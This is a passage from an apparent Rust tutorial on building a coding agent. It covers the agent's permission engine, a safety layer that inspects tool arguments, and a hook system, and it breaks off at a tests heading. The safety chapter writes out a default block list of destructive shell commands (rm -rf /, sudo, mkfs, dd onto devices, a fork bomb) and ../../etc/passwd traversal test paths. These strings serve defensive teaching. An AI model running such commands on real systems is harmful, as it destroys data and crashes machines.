- Three outcomes -- Allow, Deny, Ask. Every tool call gets one of these before it runs.
- Ordered pipeline -- Session approvals first, then rules, then default permission. Specific policies beat general ones.
- Glob-pattern rules -- Rules use glob::Pattern for tool name matching. The first matching rule wins. This gives users fine-grained control over which tools require approval.
- Session approvals -- Once the user says yes, that tool is approved for the session. Per-tool, in-memory, not persistent.
- Convenience constructors -- ask_by_default() for interactive use, allow_all() for bypass mode.
The engine is pure logic -- it does not execute tools, and it does not interact with the user. It takes a tool name and arguments, and returns a decision. This separation makes it testable, composable, and easy to reason about.
What's next
The permission engine decides whether a tool call should run based on who the tool is and what mode the user is in. But it does not look at what the tool is being asked to do. A bash tool is bash whether it runs ls or rm -rf /. A write tool is a write tool whether it targets src/main.rs or .env.
Chapter 14 adds safety checks -- static analysis of tool arguments that catches dangerous patterns before the permission prompt even appears. It validates paths against allowed directories, matches filenames against protected patterns (.env, .git/config), and filters bash commands for blocked patterns (rm -rf /, sudo, fork bombs). Safety checks wrap tools so that dangerous calls are blocked before they execute.
Check yourself
← Chapter 12: Tool Registry · Contents · Chapter 14: Safety Checks →
Chapter 14: Safety Checks
File(s) to edit: src/safety.rs
Test to run: cargo test -p mini-claw-code-starter safety
Estimated time: 40 min
The permission engine from Chapter 13 gates every tool call -- it decides whether to allow, deny, or ask the user before execution proceeds. But it makes that decision based on the tool, not the arguments. A write call in auto mode is allowed regardless of whether the target path is src/main.rs or .env. A bash call in default mode prompts the user whether the command is ls or rm -rf /. The permission engine knows who is knocking. It does not look at what they are carrying.
Safety checks fill that gap. The SafetyChecker performs static analysis on tool arguments before the permission engine runs. It examines the actual path being written or the actual command being executed, and blocks operations that are dangerous regardless of what the permission mode says. This is defense-in-depth: even if the permission engine would allow a tool call, the safety checker can still reject it.
Why two layers? Because they protect against different failure modes. The permission engine protects against the LLM doing things the user did not authorize. The safety checker protects against the LLM doing things that are never safe -- writing to .env, running rm -rf /, executing a fork bomb. A user who sets bypass mode is saying "I trust the agent." The safety checker says "trust has limits."
cargo test -p mini-claw-code-starter safety
Goal
- Implement PathValidator to confine file operations to a single directory tree, blocking path traversal attacks like ../../etc/passwd.
- Implement CommandFilter to block dangerous shell commands (rm -rf /, sudo, fork bombs) using glob pattern matching.
- Implement ProtectedFileCheck to prevent writes and edits to sensitive files matching protected patterns (.env, .git/config).
- Wire all checks together through SafeToolWrapper so that any single safety failure blocks the tool call and returns a descriptive error to the LLM.
The SafetyCheck trait and implementations
The safety system lives in src/safety.rs. Unlike the reference implementation which uses a single SafetyChecker struct, the starter uses a trait-based design with three focused implementations and a wrapper.
The SafetyCheck trait
pub trait SafetyCheck: Send + Sync {
    fn check(&self, tool_name: &str, args: &Value) -> Result<(), String>;
}
Each safety check implements this trait. It receives the tool name and arguments, and returns Ok(()) to allow execution or Err(reason) to block it. The trait requires Send + Sync because safety checks are stored inside SafeToolWrapper, which implements Tool and may be shared across async tasks.
Key Rust concept: Send + Sync trait bounds
The Send + Sync bounds on SafetyCheck are required because tools live inside Box<dyn Tool>, which is stored in a HashMap that the agent holds. In an async runtime like tokio, the agent's futures may be moved between threads. Send means the type can be transferred to another thread. Sync means &self references can be shared between threads. Together they guarantee that the safety check can be called from any async task without data races. Without these bounds, the compiler would refuse to store Box<dyn SafetyCheck> inside SafeToolWrapper, because SafeToolWrapper itself must be Send + Sync to satisfy the Tool trait.
PathValidator
pub struct PathValidator {
    allowed_dir: PathBuf,
    raw_dir: PathBuf,
}
The PathValidator confines file operations to a single directory tree. It canonicalizes the allowed directory at construction time, then validates each path argument against it. The agent cannot write to /etc/passwd or edit ~/.ssh/authorized_keys even if the LLM asks nicely.
The validate_path method resolves relative paths against raw_dir, canonicalizes the result (or its parent for new files), and checks starts_with against allowed_dir. The SafetyCheck implementation only fires for tools that take a path argument (read, write, edit).
CommandFilter
pub struct CommandFilter {
    blocked_patterns: Vec<glob::Pattern>,
}
The CommandFilter checks bash commands against a list of blocked glob patterns. rm -rf / deletes everything. sudo escalates privileges. :(){:|:&};: is a fork bomb that crashes the system. These are never safe to run, regardless of context.
The default_filters() constructor provides a sensible starting point:
pub fn default_filters() -> Self {
    Self::new(&[
        "rm -rf /".into(),
        "rm -rf /*".into(),
        "sudo *".into(),
        "> /dev/sda*".into(),
        "mkfs.*".into(),
        "dd if=*of=/dev/*".into(),
        ":(){:|:&};:".into(),
    ])
}
ProtectedFileCheck
pub struct ProtectedFileCheck {
    patterns: Vec<glob::Pattern>,
}
The ProtectedFileCheck blocks writes and edits to files matching protected glob patterns. It checks both the full path and just the filename against each pattern, so a pattern like .env matches /project/.env regardless of directory.
The SafeToolWrapper
The SafeToolWrapper is the glue that connects safety checks to the tool system:
pub struct SafeToolWrapper {
    inner: Box<dyn Tool>,
    checks: Vec<Box<dyn SafetyCheck>>,
}
It wraps a Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. When call() is invoked, it runs all safety checks first. If any check returns Err, the wrapper returns Ok(format!("error: safety check failed: {reason}")) -- note that it returns Ok with an error message string, not Err. This is because in the starter, Tool::call returns anyhow::Result<String>, and a safety denial is not a system error -- it is a controlled rejection that the LLM should see and adapt to.
#[async_trait]
impl Tool for SafeToolWrapper {
    fn definition(&self) -> &ToolDefinition {
        self.inner.definition()
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        // Run all safety checks. If any returns Err, return the error as a string.
        // Otherwise, call the inner tool.
        unimplemented!()
    }
}
The with_check convenience constructor wraps a single check:
pub fn with_check(tool: Box<dyn Tool>, check: impl SafetyCheck + 'static) -> Self {
    Self::new(tool, vec![Box::new(check)])
}
This design means safety checks are composable. You can wrap a tool with a PathValidator, a CommandFilter, and a ProtectedFileCheck all at once -- each runs independently, and any single failure blocks the call.
How the checks dispatch
flowchart LR
A["SafeToolWrapper.call(args)"] --> B["PathValidator"]
A --> C["CommandFilter"]
A --> D["ProtectedFileCheck"]
B -->|"read/write/edit"| E{"Path inside<br/>allowed_dir?"}
C -->|"bash"| F{"Command<br/>matches blocked<br/>pattern?"}
D -->|"write/edit"| G{"Filename<br/>matches protected<br/>pattern?"}
E -->|No| H["Err: blocked"]
E -->|Yes| I["Ok"]
F -->|Yes| H
F -->|No| I
G -->|Yes| H
G -->|No| I
I --> J["Inner tool.call(args)"]
H --> K["Return error string<br/>to LLM"]
Each SafetyCheck implementation decides which tools it applies to by matching on the tool_name parameter in its check method:
- PathValidator -- Fires for read, write, and edit. Extracts the path argument and validates it against the allowed directory.
- CommandFilter -- Fires only for bash. Extracts the command argument and checks it against blocked patterns.
- ProtectedFileCheck -- Fires for write and edit. Extracts the path argument and checks both the full path and filename against protected patterns.
Tools that do not match any check pass through unchecked. Read-only tools like read are checked by PathValidator (to enforce directory boundaries) but not by ProtectedFileCheck (reading .env is not dangerous -- the danger is in writing to sensitive files).
Each check returns Ok(()) for tools it does not handle, so wrapping a tool with an irrelevant check is harmless -- it just passes through.
Path validation
The PathValidator::validate_path method implements directory containment checking:
pub fn validate_path(&self, path: &str) -> Result<(), String> {
    let target = Path::new(path);

    // Step 1: resolve to absolute path
    let resolved = if target.is_absolute() {
        target.to_path_buf()
    } else {
        self.raw_dir.join(target)
    };

    // Step 2: canonicalize (resolves symlinks and ..)
    let canonical = if resolved.exists() {
        resolved
            .canonicalize()
            .map_err(|e| format!("cannot resolve path: {e}"))?
    } else {
        // For new files, canonicalize the parent directory
        let parent = resolved.parent().ok_or("invalid path")?;
        if parent.exists() {
            let mut c = parent
                .canonicalize()
                .map_err(|e| format!("cannot resolve parent: {e}"))?;
            if let Some(filename) = resolved.file_name() {
                c.push(filename);
            }
            c
        } else {
            return Err(format!("parent directory does not exist: {}", parent.display()));
        }
    };

    // Step 3: check containment
    if canonical.starts_with(&self.allowed_dir) {
        Ok(())
    } else {
        Err(format!(
            "path {} is outside allowed directory {}",
            canonical.display(),
            self.allowed_dir.display()
        ))
    }
}
The key steps:
- Resolve relative paths against
raw_dirto get an absolute path. - Canonicalize the target. If the file exists, canonicalize it directly. If not, canonicalize the parent directory and append the filename. This handles the common case of writing a new file in an existing directory.
- Check
starts_withagainst the canonicalizedallowed_dir.
This is more robust than a simple prefix match because canonicalization resolves .. components and symlinks. A path like /project/../etc/passwd gets resolved to /etc/passwd, which fails the starts_with check against /project.
Protected file pattern matching
The ProtectedFileCheck uses glob::Pattern for matching. For each write or edit call, it extracts the path argument and checks both the full path and just the filename against each pattern:
fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> {
    match tool_name {
        "write" | "edit" => {
            if let Some(path) = args.get("path").and_then(|v| v.as_str()) {
                for pattern in &self.patterns {
                    // Check full path and filename separately
                    if pattern.matches(path)
                        || pattern.matches(
                            Path::new(path)
                                .file_name()
                                .unwrap_or_default()
                                .to_str()
                                .unwrap_or(""),
                        )
                    {
                        return Err(format!(
                            "file `{path}` is protected (matches pattern `{}`)",
                            pattern.as_str()
                        ));
                    }
                }
                Ok(())
            } else {
                Ok(())
            }
        }
        _ => Ok(()),
    }
}
Checking both the full path and the filename is important. A pattern like .env should match /project/.env whether you write the pattern as a full path glob or a simple filename. The glob::Pattern crate handles the actual matching, giving us proper glob semantics including wildcards and character classes.
Command filtering
The CommandFilter::is_blocked method checks a command against blocked glob patterns:
pub fn is_blocked(&self, command: &str) -> Option<&str> {
    // Trim command, check against each pattern, return matching pattern
    unimplemented!()
}
Unlike the reference implementation which uses substring matching, the starter uses glob::Pattern for command matching. This gives more expressive pattern support -- "sudo *" matches any command starting with sudo followed by arguments, while "rm -rf /*" matches the specific dangerous pattern.
The SafetyCheck implementation only fires for the bash tool:
fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> {
    // Only check 'bash' tool, extract command, call is_blocked
    unimplemented!()
}
The limitations are similar to any pattern-based approach: it can produce false positives (blocking harmless commands that match a pattern) and false negatives (missing dangerous commands that use different syntax). For a tutorial, pattern matching is the right trade-off -- it demonstrates the architecture without the complexity of shell parsing.
How Claude Code does it
Claude Code's safety checking is considerably more sophisticated, operating at multiple levels:
Command classification with parsing. Rather than substring matching, Claude Code classifies commands using regex patterns combined with shell AST parsing. It understands that rm -rf / and rm -r -f / and command rm -rf / are the same operation. It parses pipes and redirects to check each command in a pipeline separately. Our glob-based approach is a flat match against the whole command string -- no structure, no parsing.
Path normalization and symlink resolution. Claude Code resolves ../, ~, environment variables, and symbolic links before checking paths. A path like $HOME/../../../etc/passwd gets normalized to /etc/passwd before the directory check runs. Our PathValidator also canonicalizes paths, resolving ../ components and symlinks, but it does not expand ~ or environment variables.
Git-aware protected paths. Claude Code considers git status when deciding what to protect. An untracked .env file (one that is not in the repository) gets stronger protection than a tracked one -- if it is untracked, it likely contains real secrets that were intentionally excluded from version control. Our implementation treats all .env files the same.
Severity levels. Claude Code distinguishes between operations that should be warned about and operations that should be blocked. Writing to .env might produce a warning that the user can override. Running rm -rf / is an unconditional block. Our safety checks have a single severity -- blocked, no override.
The gap between our implementation and Claude Code's is intentional. Glob matching and canonicalized prefix checking are easy to reason about and easy to test. They demonstrate the architecture of safety checking -- a separate layer that inspects arguments before tool execution -- without the complexity of shell parsing and full path resolution. If you understand how the SafetyCheck layer fits into the pipeline, you understand how Claude Code's safety system fits. The sophistication of the individual checks is an implementation detail.
Where safety checks fit in the pipeline
To see the complete picture, here is how safety checks and the permission engine compose. In the starter, safety checks are embedded inside the tool via SafeToolWrapper. When the SimpleAgent dispatches a tool call:
LLM requests tool call
|
v
PermissionEngine.evaluate(tool_name, args)
|--- Deny? --> block, return error to LLM
|--- Ask? --> prompt user
|--- Allow? --> continue
v
SafeToolWrapper.call(args)
|--- SafetyCheck fails? --> return Ok("error: ...") to LLM
|--- All checks pass? --> continue
v
Inner Tool.call(args)
|
v
Return result to LLM
In this design, the permission engine runs first (deciding whether the tool should run at all), and the safety checks run inside the tool call itself. The SafeToolWrapper catches dangerous arguments even when the permission engine allows the call. The wrapper returns an error string (not an Err) so the LLM sees the rejection reason and can adjust its approach.
This means safety checks are the inner defense layer. Even with allow_all() permission mode, a tool wrapped with SafeToolWrapper will still block writes to .env or commands containing rm -rf /. The safety wrapper is the floor that no permission configuration can lower.
Tests
Run the safety check tests:
cargo test -p mini-claw-code-starter safety
Key tests:
- test_safety_path_within_allowed -- A file inside the allowed directory passes validation.
- test_safety_path_outside_allowed -- /etc/passwd is rejected when the allowed directory is a temp dir.
- test_safety_path_traversal_blocked -- A ../../etc/passwd traversal path is resolved and rejected.
- test_safety_path_new_file_in_allowed -- A new (not-yet-existing) file in the allowed directory passes validation.
- test_safety_safety_check_read_tool -- PathValidator fires for the read tool and validates the path argument.
- test_safety_safety_check_ignores_bash -- PathValidator skips the bash tool (no path argument to check).
- test_safety_command_filter_blocks_rm_rf -- rm -rf / and rm -rf /* are both caught.
- test_safety_command_filter_blocks_sudo -- sudo rm file matches the sudo * pattern.
- test_safety_command_filter_allows_safe -- ls -la, echo hello, and cargo test pass through.
- test_safety_protected_file_blocks_env -- Writes to .env and .env.local are blocked.
- test_safety_protected_file_allows_normal -- Writes to src/main.rs pass through.
- test_safety_wrapper_blocks_on_check_failure -- SafeToolWrapper returns an "error: safety check failed" string when a check fails.
- test_safety_wrapper_allows_valid_call -- SafeToolWrapper passes through to the inner tool when all checks pass.
- test_safety_custom_blocked_commands -- Custom blocked patterns (docker rm *, npm publish*) work correctly.
Key takeaway
Safety checks inspect tool arguments, not tool identity. The permission engine asks "should this tool run at all?" while safety checks ask "is this specific invocation dangerous?" The two layers compose through defense-in-depth: even with all permissions granted, SafeToolWrapper still blocks writes to .env and commands matching rm -rf /.
Recap
The safety system adds a second layer of defense between the LLM and tool execution:
- Trait-based design -- The SafetyCheck trait allows composable, independent checks. PathValidator, CommandFilter, and ProtectedFileCheck each handle one concern.
- Argument-level inspection -- Unlike the permission engine which checks tool identity, safety checks examine the actual arguments: which file is being written, which command is being run.
- SafeToolWrapper -- Wraps any Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. Returns Ok("error: ...") on failure, not Err, so the LLM sees the rejection and can adapt.
- Glob-based matching -- Both CommandFilter and ProtectedFileCheck use glob::Pattern for pattern matching, giving expressive matching without custom code.
- Path canonicalization -- PathValidator canonicalizes paths before checking, preventing bypass via .. components or symlinks.
- Defense-in-depth -- Safety checks run inside the tool call. Even with allow_all() permission mode, wrapped tools still enforce safety rules.
The architecture -- composable checks that inspect arguments and wrap tools -- demonstrates the same defense-in-depth pattern that Claude Code uses.
What's next
In Chapter 15: Hook System you will build pre-tool and post-tool hooks -- shell commands that run before and after tool execution. Hooks let users enforce custom policies beyond what the built-in safety checker covers: run a linter after every edit, block writes to specific directories, log every bash command. Where the safety checker is a built-in guard, hooks are user-defined guards.
Check yourself
← Chapter 13: Permission Engine · Contents · Chapter 15: Hooks →
Chapter 15: Hooks
File(s) to edit: src/hooks.rs
Test to run: cargo test -p mini-claw-code-starter hooks
Estimated time: 40 min
The permission engine from Chapter 13 decides whether a tool call runs. The safety checks from Chapter 14 catch dangerous patterns before the user even sees a prompt. But both systems are baked into the agent -- they enforce rules that you, the developer, chose at compile time. What about the user?
Users have policies that the agent author cannot anticipate. A team might require that every bash command is logged to an audit file. A project might enforce that file writes only touch a specific directory. A CI pipeline might need to run a linter after every edit. These are not safety checks in the "prevent rm -rf /" sense -- they are workflow hooks that extend the agent's behavior at runtime.
This chapter builds the hook system. Hooks are event-driven: they fire at key lifecycle points (before a tool call, after a tool call, when the agent starts, when it ends) and they can observe, modify, or block execution. The trait-based design means anyone can implement a hook -- a logging hook for debugging, a blocking hook for policy enforcement, a shell hook that delegates decisions to external commands.
cargo test -p mini-claw-code-starter hooks
Goal
- Define the HookEvent enum with four lifecycle points (AgentStart, PreToolCall, PostToolCall, AgentEnd) that carry contextual data.
- Implement the Hook trait and HookRegistry dispatch logic where Block short-circuits, ModifyArgs accumulates, and Continue is the default.
- Build three concrete hooks: LoggingHook (observe all events), BlockingHook (deny specific tools), and ShellHook (delegate to external commands).
- Ensure hooks compose correctly -- registration order determines priority, and blocking hooks prevent later hooks from running.
The event model
Before writing any code, let's define when hooks fire. The agent loop from Chapter 7 has a clear lifecycle:
User prompt arrives
-> AgentStart
-> Provider returns tool calls
-> PreToolCall (for each tool)
-> Tool executes
-> PostToolCall (for each tool)
-> Provider returns final answer
-> AgentEnd
sequenceDiagram
participant Agent
participant Registry as HookRegistry
participant Tool
Agent->>Registry: dispatch(AgentStart)
loop For each tool call
Agent->>Registry: dispatch(PreToolCall)
alt Block returned
Registry-->>Agent: Block(reason)
Agent->>Agent: Return error to LLM
else Continue/ModifyArgs
Registry-->>Agent: Continue or ModifyArgs
Agent->>Tool: tool.call(args)
Tool-->>Agent: result
Agent->>Registry: dispatch(PostToolCall)
end
end
Agent->>Registry: dispatch(AgentEnd)
Four events, four points where external code can intervene:
| Event | When it fires | What hooks can do |
|---|---|---|
| AgentStart | Before the first provider call | Log the prompt, initialize state |
| PreToolCall | Before each tool execution | Block the call, modify arguments |
| PostToolCall | After each tool execution | Log the result, trigger follow-up actions |
| AgentEnd | After the final response | Log the response, clean up state |
The asymmetry is deliberate. PreToolCall can block or modify because the tool has not run yet -- there is still time to intervene. PostToolCall cannot block because the tool already ran -- blocking at this point would be meaningless. It can only observe.
Core types
Open src/hooks.rs. The module defines three types: HookEvent, HookAction, and the Hook trait.
HookEvent
#[derive(Debug, Clone)]
pub enum HookEvent {
    PreToolCall {
        tool_name: String,
        args: Value,
    },
    PostToolCall {
        tool_name: String,
        args: Value,
        result: String,
    },
    AgentStart {
        prompt: String,
    },
    AgentEnd {
        response: String,
    },
}
Each variant carries the data relevant to its lifecycle point. PreToolCall carries the tool name and arguments -- everything a hook needs to decide whether to allow or modify the call. PostToolCall adds the result string. AgentStart and AgentEnd carry the user prompt and final response respectively.
The enum derives Clone because the HookRegistry passes events by shared reference (`&HookEvent`) to each hook in sequence. Hooks that need to retain event data can clone the event or, like the LoggingHook, format it into an owned String. Hooks that only inspect events (like the BlockingHook) borrow without cloning.
HookAction
```rust
#[derive(Debug, Clone, PartialEq)]
pub enum HookAction {
    Continue,
    Block(String),
    ModifyArgs(Value),
}
```
Three possible responses, ordered by severity:
- `Continue` -- the default. The hook has nothing to say. Execution proceeds normally.
- `Block(reason)` -- stop the tool call. The reason string is returned to the LLM as an error message so it can understand why the call was rejected and adjust its approach.
- `ModifyArgs(new_args)` -- replace the tool's arguments before execution. This is how hooks can inject defaults, normalize paths, or enforce constraints without blocking the call entirely.
HookAction derives PartialEq so tests can assert on specific actions with assert_eq!. This is purely a testing convenience -- the runtime uses pattern matching, not equality checks.
The Hook trait
```rust
#[async_trait]
pub trait Hook: Send + Sync {
    async fn on_event(&self, event: &HookEvent) -> HookAction;
}
```
One method. It receives an event reference and returns an action. The trait requires Send + Sync because hooks live inside the HookRegistry and the registry may be shared across async tasks. The async_trait attribute handles the usual ceremony of boxing the returned future.
This is the same pattern as the Tool trait from Chapter 6 -- a single async method that takes structured input and returns structured output. The difference is scope: tools interact with the outside world (filesystem, shell), while hooks interact with the agent's own execution.
The HookRegistry
Individual hooks are useful, but the real value is composing them. The HookRegistry holds a list of hooks and dispatches events to them sequentially.
```rust
pub struct HookRegistry {
    hooks: Vec<Box<dyn Hook>>,
}

impl HookRegistry {
    pub fn new() -> Self {
        Self { hooks: Vec::new() }
    }

    pub fn register(&mut self, hook: impl Hook + 'static) {
        self.hooks.push(Box::new(hook));
    }

    pub fn with(mut self, hook: impl Hook + 'static) -> Self {
        self.register(hook);
        self
    }

    pub fn is_empty(&self) -> bool {
        self.hooks.is_empty()
    }
}
```
The builder API should look familiar -- it mirrors ToolSet from Chapter 4. The with() method takes ownership and returns self for chaining. The register() method takes &mut self for imperative code. Both accept impl Hook + 'static, boxing the concrete type into a trait object.
The dispatch method
The interesting part is how actions compose:
```rust
pub async fn dispatch(&self, event: &HookEvent) -> HookAction {
    // Iterate hooks in order
    // If any hook returns Block, return Block immediately
    // If any hook returns ModifyArgs, remember the new args
    // If all hooks return Continue (and no ModifyArgs), return Continue
    unimplemented!()
}
```
Three rules:
1. `Block` short-circuits. The moment any hook returns `Block`, the registry stops and returns that action immediately. Later hooks never see the event. This is the right behavior -- if a policy says "no bash," there is no point asking the logging hook for its opinion.
2. `ModifyArgs` accumulates. If multiple hooks return `ModifyArgs`, the last one wins. Each hook that modifies arguments overwrites the previous modification. This is simple but effective -- if you need more complex composition (merging argument objects), you can implement it in a single hook that encapsulates the logic.
3. `Continue` is the default. If no hook has an opinion, execution proceeds unchanged. An empty registry always returns `Continue`.
The sequential evaluation order means hook priority is determined by registration order. Hooks registered first run first. If you want a blocking hook to take precedence over a logging hook, register it first.
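The three composition rules can be sketched with plain synchronous stand-ins. The real `dispatch` is async and `ModifyArgs` carries a `serde_json::Value`; here a `String` stands in to keep the sketch dependency-free:

```rust
// Simplified, synchronous stand-in for HookAction, just to show how
// dispatch composes the actions returned by a sequence of hooks.
#[derive(Debug, Clone, PartialEq)]
enum HookAction {
    Continue,
    Block(String),
    ModifyArgs(String), // the starter uses serde_json::Value here
}

fn dispatch(actions: impl IntoIterator<Item = HookAction>) -> HookAction {
    let mut result = HookAction::Continue;
    for action in actions {
        match action {
            // Rule 1: Block short-circuits -- later hooks never run.
            HookAction::Block(reason) => return HookAction::Block(reason),
            // Rule 2: ModifyArgs accumulates -- the last writer wins.
            HookAction::ModifyArgs(args) => result = HookAction::ModifyArgs(args),
            // Rule 3: Continue never overwrites an earlier modification.
            HookAction::Continue => {}
        }
    }
    result
}

fn main() {
    // Block wins even if a later hook would modify.
    let a = dispatch([
        HookAction::Continue,
        HookAction::Block("no bash".into()),
        HookAction::ModifyArgs("ignored".into()),
    ]);
    assert_eq!(a, HookAction::Block("no bash".into()));

    // Last ModifyArgs wins when nothing blocks.
    let b = dispatch([
        HookAction::ModifyArgs("first".into()),
        HookAction::Continue,
        HookAction::ModifyArgs("second".into()),
    ]);
    assert_eq!(b, HookAction::ModifyArgs("second".into()));
}
```

Note that `Continue` after a `ModifyArgs` leaves the modification in place -- only another `ModifyArgs` or a `Block` changes the outcome.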
Built-in hooks
The module provides three ready-made hooks. Each demonstrates a different pattern of hook usage.
LoggingHook
```rust
pub struct LoggingHook {
    log: std::sync::Mutex<Vec<String>>,
}

impl LoggingHook {
    pub fn new() -> Self {
        Self {
            log: std::sync::Mutex::new(Vec::new()),
        }
    }

    pub fn messages(&self) -> Vec<String> {
        self.log.lock().unwrap().clone()
    }
}

#[async_trait]
impl Hook for LoggingHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        // Format as "pre:{tool_name}", "post:{tool_name}", "agent:start", "agent:end"
        unimplemented!()
    }
}
```
The simplest possible hook: record a short description of every event, never interfere. It always returns Continue, meaning it never blocks or modifies anything. The Mutex<Vec<String>> allows interior mutability -- the on_event method takes &self (not &mut self), so we need a lock to push into the vector.
Key Rust concept: Mutex for interior mutability in async code
The Hook trait requires &self (not &mut self) because the registry holds hooks by shared reference. But LoggingHook needs to mutate its internal log. The solution is std::sync::Mutex<Vec<String>> -- a lock that provides mutual exclusion. When on_event calls self.log.lock().unwrap(), it gets exclusive access to the Vec, pushes a message, and drops the lock when the guard goes out of scope.
Why std::sync::Mutex and not tokio::sync::Mutex? Because the lock is held only for a push operation -- microseconds, no .await inside the critical section. The standard library Mutex is faster for short, synchronous critical sections. You only need tokio::sync::Mutex when you must hold the lock across an .await point.
In the starter, the LoggingHook records string descriptions rather than cloned events. The format is compact: "pre:bash", "post:write", "agent:start", "agent:end". This makes test assertions simpler -- you compare strings rather than matching enum variants.
The LoggingHook is invaluable for testing. You can construct a registry with a LoggingHook, fire some events, and then inspect what was recorded. This is exactly what the tests do.
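The formatting logic behind `on_event` can be sketched synchronously. This stand-in drops the async machinery and the `args` payloads (the starter's `HookEvent` carries `serde_json::Value` arguments), but the match and the lock-push pattern are the same:

```rust
use std::sync::Mutex;

// Minimal stand-in for the starter's HookEvent, without args payloads.
enum HookEvent {
    PreToolCall { tool_name: String },
    PostToolCall { tool_name: String },
    AgentStart,
    AgentEnd,
}

struct LoggingHook {
    log: Mutex<Vec<String>>,
}

impl LoggingHook {
    fn on_event(&self, event: &HookEvent) {
        let msg = match event {
            HookEvent::PreToolCall { tool_name } => format!("pre:{tool_name}"),
            HookEvent::PostToolCall { tool_name } => format!("post:{tool_name}"),
            HookEvent::AgentStart => "agent:start".to_string(),
            HookEvent::AgentEnd => "agent:end".to_string(),
        };
        // Lock, push, and drop the guard when the statement ends.
        self.log.lock().unwrap().push(msg);
    }
}

fn main() {
    let hook = LoggingHook { log: Mutex::new(Vec::new()) };
    hook.on_event(&HookEvent::AgentStart);
    hook.on_event(&HookEvent::PreToolCall { tool_name: "bash".into() });
    assert_eq!(*hook.log.lock().unwrap(), vec!["agent:start", "pre:bash"]);
}
```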
BlockingHook
```rust
pub struct BlockingHook {
    blocked_tools: Vec<String>,
    reason: String,
}

impl BlockingHook {
    pub fn new(blocked_tools: Vec<String>, reason: impl Into<String>) -> Self {
        Self {
            blocked_tools,
            reason: reason.into(),
        }
    }
}

#[async_trait]
impl Hook for BlockingHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        if let HookEvent::PreToolCall { tool_name, .. } = event {
            if self.blocked_tools.iter().any(|b| b == tool_name) {
                return HookAction::Block(self.reason.clone());
            }
        }
        HookAction::Continue
    }
}
```
A policy hook: it takes a list of tool names and blocks any PreToolCall event that matches. Everything else -- PostToolCall, AgentStart, AgentEnd, and pre-tool events for tools not on the list -- passes through as Continue.
The pattern match is deliberate. The hook only inspects PreToolCall events. On a PostToolCall for a blocked tool, it does nothing -- the tool has already run and blocking would be meaningless. This is the asymmetry from the event model table above, enforced in code.
You could use BlockingHook to implement workspace-level policies. For example, a read-only project might block write, edit, and bash:
```rust
let hook = BlockingHook::new(
    vec!["write".into(), "edit".into(), "bash".into()],
    "this workspace is read-only",
);
```
The LLM would see the block reason in the tool result and switch to read-only tools for the rest of the session.
ShellHook
```rust
pub struct ShellHook {
    command: String,
    tool_pattern: Option<glob::Pattern>,
}

impl ShellHook {
    pub fn new(command: impl Into<String>) -> Self {
        Self {
            command: command.into(),
            tool_pattern: None,
        }
    }

    pub fn for_tool(mut self, pattern: &str) -> Self {
        self.tool_pattern = glob::Pattern::new(pattern).ok();
        self
    }

    fn matches_tool(&self, tool_name: &str) -> bool {
        match &self.tool_pattern {
            Some(pattern) => pattern.matches(tool_name),
            None => true,
        }
    }
}
```
The ShellHook bridges the gap between Rust code and external commands. Instead of implementing policy in Rust, it delegates to a shell command. The command signals its decision through its exit code.
The for_tool builder method restricts which tools the hook fires for, using a glob pattern. Without it, the hook fires for all tools. ShellHook::new("cargo fmt --check").for_tool("write") only fires when the write tool is called.
The on_event implementation handles PreToolCall and PostToolCall events:
```rust
#[async_trait]
impl Hook for ShellHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        // Only handle PreToolCall and PostToolCall events
        // Check matches_tool() first
        // Run: tokio::process::Command::new("sh").arg("-c").arg(&self.command).output()
        // Exit code 0 -> Continue, non-zero -> Block with stderr
        unimplemented!()
    }
}
```
The execution flow:
1. Extract the tool name. Only `PreToolCall` and `PostToolCall` events are handled. `AgentStart` and `AgentEnd` return `Continue` immediately.
2. Check the tool pattern. If a `tool_pattern` is set and does not match the tool name, return `Continue`.
3. Run the command. Uses `tokio::process::Command` to spawn `sh -c <command>`.
4. Interpret the exit code. A non-zero exit means "block this call." The stderr is captured and included in the block reason. A zero exit means `Continue`.
Here is a concrete example. Run a format check whenever the agent writes a file:
```rust
let hook = ShellHook::new("cargo fmt --check")
    .for_tool("write");
```
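The exit-code rule at the heart of the ShellHook can be demonstrated on its own. This sketch uses the standard library's blocking `std::process::Command` in place of the starter's `tokio::process::Command`; the decision logic is the same:

```rust
use std::process::Command;

/// Runs `sh -c <command>` and maps the exit code to a hook decision:
/// exit 0 -> allow (None), non-zero -> block, with stderr as the reason.
fn run_shell_hook(command: &str) -> Option<String> {
    let output = Command::new("sh")
        .arg("-c")
        .arg(command)
        .output()
        .expect("failed to spawn sh");
    if output.status.success() {
        None // Continue
    } else {
        // Block: surface the command's stderr so the LLM can adjust.
        Some(String::from_utf8_lossy(&output.stderr).into_owned())
    }
}

fn main() {
    // A passing check allows the tool call through.
    assert!(run_shell_hook("true").is_none());
    // A failing check blocks it, and stderr becomes the block reason.
    let reason = run_shell_hook("echo 'lint failed' >&2; exit 1").unwrap();
    assert!(reason.contains("lint failed"));
}
```

The sketch assumes a Unix `sh` is available, which matches the starter's `sh -c` invocation.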
How Claude Code does it
Claude Code's hook system shares the same event-driven architecture but is configured declaratively through settings.json rather than Rust code.
In Claude Code, hooks are defined as JSON objects with matchers and commands:
```json
{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "bash",
        "command": "/path/to/check-bash-command.sh"
      }
    ],
    "PostToolUse": [
      {
        "matcher": "*",
        "command": "echo 'Tool $TOOL_NAME completed'"
      }
    ]
  }
}
```
The matcher field supports glob patterns against tool names. The command field is a shell command that receives context through environment variables -- the same pattern as our ShellHook. Non-zero exits on pre-tool hooks block the call. Claude Code's hooks can also modify tool arguments by writing JSON to stdout, which the agent parses and applies.
Our trait-based approach provides the same extensibility through a different mechanism. Instead of JSON configuration, hooks are Rust types that implement the Hook trait. This gives us compile-time type safety and the ability to write hooks with complex logic (the BlockingHook matches against a list of tool names; the LoggingHook records structured events). The trade-off is that adding a new hook requires writing Rust code rather than editing a config file.
The ShellHook bridges this gap -- it delegates to external commands just like Claude Code's JSON-configured hooks do. A production agent would likely combine both approaches: built-in hooks for core policies (implemented in Rust) and shell hooks for user-defined customization (configured at runtime).
Tests
Run the hook system tests:
cargo test -p mini-claw-code-starter hooks
Key tests:
